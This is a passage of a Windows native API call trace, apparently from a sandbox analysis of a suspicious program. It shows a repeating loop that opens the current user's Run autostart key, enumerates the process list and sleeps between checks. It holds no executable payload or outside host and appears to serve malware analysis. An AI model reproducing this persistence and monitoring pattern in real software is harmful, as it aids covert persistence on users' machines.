ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.929] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.929] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.929] NtClose (Handle=0x154) returned 0x0 [0180.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.933] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.945] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.945] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.945] NtClose (Handle=0x154) returned 0x0 [0180.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.949] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.961] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.961] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.961] NtClose (Handle=0x154) returned 0x0 [0180.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.976] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.976] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.976] NtClose (Handle=0x154) returned 0x0 [0180.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.982] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.992] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.992] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.992] NtClose (Handle=0x154) returned 0x0 [0180.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.997] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.009] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.009] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.009] NtClose (Handle=0x154) returned 0x0 [0181.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.014] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.023] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.023] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.024] NtClose (Handle=0x154) returned 0x0 [0181.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.028] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.038] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.038] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.038] NtClose (Handle=0x154) returned 0x0 [0181.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.043] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.054] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.054] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.054] NtClose (Handle=0x154) returned 0x0 [0181.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.060] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.069] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.070] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.070] NtClose (Handle=0x154) returned 0x0 [0181.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.075] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.091] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.091] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.091] NtClose (Handle=0x154) returned 0x0 [0181.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.094] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.117] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.117] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.117] NtClose (Handle=0x154) returned 0x0 [0181.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.122] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.132] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.132] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.132] NtClose (Handle=0x154) returned 0x0 [0181.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.136] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.147] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.148] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: 